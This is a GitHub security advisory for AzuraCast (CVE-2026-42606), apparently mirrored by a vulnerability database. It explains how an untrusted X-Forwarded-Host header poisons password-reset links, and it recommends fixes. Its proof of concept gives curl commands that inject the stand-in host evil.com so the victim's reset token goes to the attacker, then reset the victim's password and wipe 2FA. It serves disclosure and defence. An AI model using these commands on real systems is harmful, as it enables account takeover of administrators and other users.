GHSA-GV7R-3MR9-H5X8

Vulnerability from github – Published: 2026-05-04 21:17 – Updated: 2026-05-13 13:42
VLAI?
Summary
AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass
Details

Summary

The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

backend/src/Middleware/ApplyXForwarded.php:35-40:

if ($request->hasHeader('X-Forwarded-Host')) {
    $hasXForwardedHeader = true;
    $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
    if (null !== $xfHost) {
        $uri = $uri->withHost($xfHost);
    }
}

There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.

In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file — which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port — only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.

Root Cause 2: Request Host Used for Security-Critical URLs

backend/src/Http/Router.php:53-77 in buildBaseUrl():

$useRequest ??= $settings->prefer_browser_url; // default: true

// ...
if ($useRequest || $baseUrl->getHost() === '') {
    $ignoredHosts = ['web', 'nginx', 'localhost'];
    if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
        $baseUrl = (new Uri())
            ->withScheme($currentUri->getScheme())
            ->withHost($currentUri->getHost())
            ->withPort($currentUri->getPort());
    }
}

With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host — already poisoned by ApplyXForwarded — is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.

Root Cause 3: Password Reset Generates Absolute URL

backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true
);

This URL is embedded in the password reset email sent to the victim.

Root Cause 4: Reset Token Wipes 2FA

backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:

$user->setNewPassword($data['password']);
$user->two_factor_secret = null;

When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.

PoC

Prerequisites: An AzuraCast instance with a user account (e.g., admin@target.com) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.

Step 1: Trigger poisoned password reset

curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "email=admin@target.com"

Expected result: The password reset email sent to admin@target.com contains a URL like:

https://evil.com/login-token/abc123def456...

Step 2: Capture the token

When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....

Step 3: Use token on real instance

# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...

# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "csrf=<extracted_csrf_token>&password=AttackerPassword123"

Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.

Impact

  • Full account takeover of any user account, including administrators, without any prior authentication
  • 2FA bypass — the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
  • Administrative compromise — if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
  • The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success

Recommended Fix

Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist

In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):

// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';

if (!in_array($remoteAddr, $trustedProxies, true)) {
    return $handler->handle($request);
}

// ... existing X-Forwarded-* processing

Fix 2 (Defense in depth): Use configured base URL for security-critical emails

In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true,
    // Force use of configured base URL, not request host
);

Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.

Fix 3 (Defense in depth): Don't wipe 2FA on password reset

In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow — not a side effect of password reset.

Severity ?
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.23.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "azuracast/azuracast"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.23.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:17:45Z",
    "nvd_published_at": "2026-05-09T20:16:30Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `ApplyXForwarded` middleware unconditionally trusts the client-supplied `X-Forwarded-Host` HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover.\n\n## Details\n\n### Root Cause 1: Unconditional X-Forwarded-Host Trust\n\n`backend/src/Middleware/ApplyXForwarded.php:35-40`:\n```php\nif ($request-\u003ehasHeader(\u0027X-Forwarded-Host\u0027)) {\n    $hasXForwardedHeader = true;\n    $xfHost = Types::stringOrNull($request-\u003egetHeaderLine(\u0027X-Forwarded-Host\u0027), true);\n    if (null !== $xfHost) {\n        $uri = $uri-\u003ewithHost($xfHost);\n    }\n}\n```\n\nThere is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.\n\nIn the default Docker deployment, nginx\u0027s PHP location block (`util/docker/web/nginx/azuracast.conf.tmpl:150-171`) uses `fastcgi_pass` with `include fastcgi_params`. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as `HTTP_*` parameters. The `proxy_params.conf` file \u2014 which explicitly sets `X-Forwarded-For`, `X-Forwarded-Proto`, and `X-Forwarded-Port` \u2014 only applies to `proxy_pass` directives (websocket and vite dev server), NOT to the `fastcgi_pass` PHP handler. Therefore, client-supplied `X-Forwarded-Host` reaches PHP unmodified.\n\n### Root Cause 2: Request Host Used for Security-Critical URLs\n\n`backend/src/Http/Router.php:53-77` in `buildBaseUrl()`:\n```php\n$useRequest ??= $settings-\u003eprefer_browser_url; // default: true\n\n// ...\nif ($useRequest || $baseUrl-\u003egetHost() === \u0027\u0027) {\n    $ignoredHosts = [\u0027web\u0027, \u0027nginx\u0027, \u0027localhost\u0027];\n    if (!in_array($currentUri-\u003egetHost(), $ignoredHosts, true)) {\n        $baseUrl = (new Uri())\n            -\u003ewithScheme($currentUri-\u003egetScheme())\n            -\u003ewithHost($currentUri-\u003egetHost())\n            -\u003ewithPort($currentUri-\u003egetPort());\n    }\n}\n```\n\nWith `prefer_browser_url = true` (the default at `backend/src/Entity/Settings.php:109`), the request URI host \u2014 already poisoned by `ApplyXForwarded` \u2014 is used as the base URL for generating absolute URLs. Even if a `base_url` is configured in settings, it is overridden by the poisoned request host.\n\n### Root Cause 3: Password Reset Generates Absolute URL\n\n`backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77`:\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true\n);\n```\n\nThis URL is embedded in the password reset email sent to the victim.\n\n### Root Cause 4: Reset Token Wipes 2FA\n\n`backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75`:\n```php\n$user-\u003esetNewPassword($data[\u0027password\u0027]);\n$user-\u003etwo_factor_secret = null;\n```\n\nWhen a `ResetPassword` token is consumed, the user\u0027s 2FA secret is unconditionally destroyed.\n\n## PoC\n\n**Prerequisites:** An AzuraCast instance with a user account (e.g., `admin@target.com`) that has 2FA enabled. Attacker controls `evil.com` with a web server that logs incoming requests.\n\n### Step 1: Trigger poisoned password reset\n\n```bash\ncurl -X POST https://target.azuracast.example/forgot \\\n  -H \"X-Forwarded-Host: evil.com\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"email=admin@target.com\"\n```\n\n**Expected result:** The password reset email sent to `admin@target.com` contains a URL like:\n```\nhttps://evil.com/login-token/abc123def456...\n```\n\n### Step 2: Capture the token\n\nWhen the victim clicks the link in their email, their browser navigates to `https://evil.com/login-token/abc123def456...`. The attacker\u0027s web server at `evil.com` captures the full URL path, extracting the token `abc123def456...`.\n\n### Step 3: Use token on real instance\n\n```bash\n# First, GET the reset page to obtain CSRF token\ncurl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...\n\n# Extract CSRF token from response, then POST new password\ncurl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"csrf=\u003cextracted_csrf_token\u003e\u0026password=AttackerPassword123\"\n```\n\n**Result:** The victim\u0027s password is changed to `AttackerPassword123` and their 2FA is destroyed (`two_factor_secret = null`). The attacker is logged in with full access.\n\n## Impact\n\n- **Full account takeover** of any user account, including administrators, without any prior authentication\n- **2FA bypass** \u2014 the password reset flow unconditionally destroys 2FA configuration, negating its security benefit\n- **Administrative compromise** \u2014 if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings\n- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success\n\n## Recommended Fix\n\n**Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist**\n\nIn `backend/src/Middleware/ApplyXForwarded.php`, only apply `X-Forwarded-*` headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):\n\n```php\n// Add trusted proxy check\n$trustedProxies = [\u0027127.0.0.1\u0027, \u0027::1\u0027, \u0027nginx\u0027, \u0027web\u0027];\n$remoteAddr = $request-\u003egetServerParams()[\u0027REMOTE_ADDR\u0027] ?? \u0027\u0027;\n\nif (!in_array($remoteAddr, $trustedProxies, true)) {\n    return $handler-\u003ehandle($request);\n}\n\n// ... existing X-Forwarded-* processing\n```\n\n**Fix 2 (Defense in depth): Use configured base URL for security-critical emails**\n\nIn `ForgotPasswordAction.php`, generate the reset URL using the configured `base_url` setting rather than the request-derived URL:\n\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true,\n    // Force use of configured base URL, not request host\n);\n```\n\nOr modify `Router::buildBaseUrl()` to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.\n\n**Fix 3 (Defense in depth): Don\u0027t wipe 2FA on password reset**\n\nIn `LoginTokenAction.php:75`, remove the line `$user-\u003etwo_factor_secret = null;`. If 2FA recovery is needed, it should be a separate, explicit flow \u2014 not a side effect of password reset.",
  "id": "GHSA-gv7r-3mr9-h5x8",
  "modified": "2026-05-13T13:42:21Z",
  "published": "2026-05-04T21:17:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42606"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AzuraCast/AzuraCast"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.